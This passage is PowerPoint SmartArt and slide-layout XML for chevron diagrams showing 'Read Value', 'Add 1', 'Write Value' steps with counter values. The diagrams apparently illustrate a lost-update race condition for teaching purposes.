      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is now 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F6032EF-B84F-4284-BB14-D161403E3438}" type="parTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}" type="sibTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" type="pres">
      <dgm:prSet presAssocID="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6616365-51C9-4546-92C4-04684C241DC3}" type="pres">
      <dgm:prSet presAssocID="{334C5C61-7004-42C5-A096-9C606EDED8D6}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" type="pres">
      <dgm:prSet presAssocID="{6047B765-4B38-4702-868C-2AA035604A24}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" type="pres">
      <dgm:prSet presAssocID="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" type="pres">
      <dgm:prSet presAssocID="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" type="pres">
      <dgm:prSet presAssocID="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{632AF404-CF73-416E-8FBE-4B89681B481F}" type="presOf" srcId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{6D756D0F-038D-4349-8CE9-4BA76C9E2B29}" type="presOf" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" srcOrd="2" destOrd="0" parTransId="{8F6032EF-B84F-4284-BB14-D161403E3438}" sibTransId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}"/>
    <dgm:cxn modelId="{20AED961-C227-4B2C-8B02-BD970F9B9BA4}" type="presOf" srcId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" srcOrd="1" destOrd="0" parTransId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" sibTransId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}"/>
    <dgm:cxn modelId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" srcOrd="0" destOrd="0" parTransId="{A00439A2-6497-499A-8137-60E12463CFF9}" sibTransId="{6047B765-4B38-4702-868C-2AA035604A24}"/>
    <dgm:cxn modelId="{89E535B8-1017-46D7-BEB5-D0D6460AE5C4}" type="presOf" srcId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{7E236EAD-4882-4B9E-98A8-AC1ED53FC545}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{D2039FD5-3481-401E-BC99-D179492A3C4C}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F25E6200-A1AB-4290-A7D9-776189932387}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{E7E49A33-1B7F-49F8-8B72-27E177EC5665}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{5E5D3EE7-0A9A-4EA1-8FB1-24CA12DE7D01}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" srcOrd="4"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065EEB-4364-4F00-A0F5-058D9BDC529B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{334C5C61-7004-42C5-A096-9C606EDED8D6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is 0)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A00439A2-6497-499A-8137-60E12463CFF9}" type="parTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6047B765-4B38-4702-868C-2AA035604A24}" type="sibTrans" cxnId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(Makes 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" type="parTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" type="sibTrans" cxnId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>(It is now 1)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F6032EF-B84F-4284-BB14-D161403E3438}" type="parTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}" type="sibTrans" cxnId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" type="pres">
      <dgm:prSet presAssocID="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6616365-51C9-4546-92C4-04684C241DC3}" type="pres">
      <dgm:prSet presAssocID="{334C5C61-7004-42C5-A096-9C606EDED8D6}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" type="pres">
      <dgm:prSet presAssocID="{6047B765-4B38-4702-868C-2AA035604A24}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" type="pres">
      <dgm:prSet presAssocID="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" type="pres">
      <dgm:prSet presAssocID="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" type="pres">
      <dgm:prSet presAssocID="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{632AF404-CF73-416E-8FBE-4B89681B481F}" type="presOf" srcId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{6D756D0F-038D-4349-8CE9-4BA76C9E2B29}" type="presOf" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{DC19E45E-5410-41D1-86BC-6A5B43D37C39}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" srcOrd="2" destOrd="0" parTransId="{8F6032EF-B84F-4284-BB14-D161403E3438}" sibTransId="{5D6CC16B-D9FD-48CD-B138-4B5D67573E38}"/>
    <dgm:cxn modelId="{20AED961-C227-4B2C-8B02-BD970F9B9BA4}" type="presOf" srcId="{C3460EF8-3560-468B-83D3-4D8C887ABC96}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{54E06B58-A6D8-44DE-B2FD-9045FC38738B}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" srcOrd="1" destOrd="0" parTransId="{DE88AF6F-6AE4-4F14-BE94-BC9B56F08EDA}" sibTransId="{7376456E-7B6C-4EA1-AC04-682E6D6876E2}"/>
    <dgm:cxn modelId="{54E1C196-CE8E-4E35-8224-E4912ACC56C9}" srcId="{3F065EEB-4364-4F00-A0F5-058D9BDC529B}" destId="{334C5C61-7004-42C5-A096-9C606EDED8D6}" srcOrd="0" destOrd="0" parTransId="{A00439A2-6497-499A-8137-60E12463CFF9}" sibTransId="{6047B765-4B38-4702-868C-2AA035604A24}"/>
    <dgm:cxn modelId="{89E535B8-1017-46D7-BEB5-D0D6460AE5C4}" type="presOf" srcId="{7DED0A38-E0D5-40D3-9DE9-3B7DA6537452}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{7E236EAD-4882-4B9E-98A8-AC1ED53FC545}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{F6616365-51C9-4546-92C4-04684C241DC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{D2039FD5-3481-401E-BC99-D179492A3C4C}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{D13D5F38-FB17-4D84-A9A5-EBF9B8E073F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F25E6200-A1AB-4290-A7D9-776189932387}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{E7E49A33-1B7F-49F8-8B72-27E177EC5665}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{5DDAD8F9-2924-4AB2-8B4B-790AE9FB27C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{5E5D3EE7-0A9A-4EA1-8FB1-24CA12DE7D01}" type="presParOf" srcId="{C5630BF9-C560-4D00-A9A8-16E8B848DAA5}" destId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevro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16365-51C9-4546-92C4-04684C241DC3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1640" y="55937"/>
          <a:ext cx="1434814" cy="57392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Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>(It is 0)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1640" y="55937"/>
        <a:ext cx="1291333" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1149492"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Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>(It will be 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1436455" y="55937"/>
        <a:ext cx="860889" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2297344"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Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>(It is 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2584307" y="55937"/>
        <a:ext cx="860889" cy="573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16365-51C9-4546-92C4-04684C241DC3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1640" y="55937"/>
          <a:ext cx="1434814" cy="57392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Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>(It is 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1640" y="55937"/>
        <a:ext cx="1291333" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1149492"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Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>(It will be 2)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1436455" y="55937"/>
        <a:ext cx="860889" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2297344"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Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>(It is now 2)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2584307" y="55937"/>
        <a:ext cx="860889" cy="573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16365-51C9-4546-92C4-04684C241DC3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1640" y="55937"/>
          <a:ext cx="1434814" cy="57392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Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>(It is 0)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1640" y="55937"/>
        <a:ext cx="1291333" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1149492"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Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>(Makes 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1436455" y="55937"/>
        <a:ext cx="860889" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2297344"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Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>(It is now 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2584307" y="55937"/>
        <a:ext cx="860889" cy="573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16365-51C9-4546-92C4-04684C241DC3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1640" y="55937"/>
          <a:ext cx="1434814" cy="57392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Read Value</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>(It is 0)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1640" y="55937"/>
        <a:ext cx="1291333" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CCD4FE7-C618-4D45-9F7C-4F1B9FE4FBAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1149492"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Add 1</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>(Makes 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1436455" y="55937"/>
        <a:ext cx="860889" cy="573925"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12905F27-33D8-43E2-91E5-3AD8D8A2A0CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2297344" y="55937"/>
          <a:ext cx="1434814" cy="5739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Write Value</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>(It is now 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2584307" y="55937"/>
        <a:ext cx="860889" cy="5739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4/14/2020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4/14/2020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62336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eflective Questions">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="header_strok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944880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="bub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 y="33129"/>
            <a:ext cx="9144000" cy="68580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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302039"/>
            <a:ext cx="8460150" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcAft>
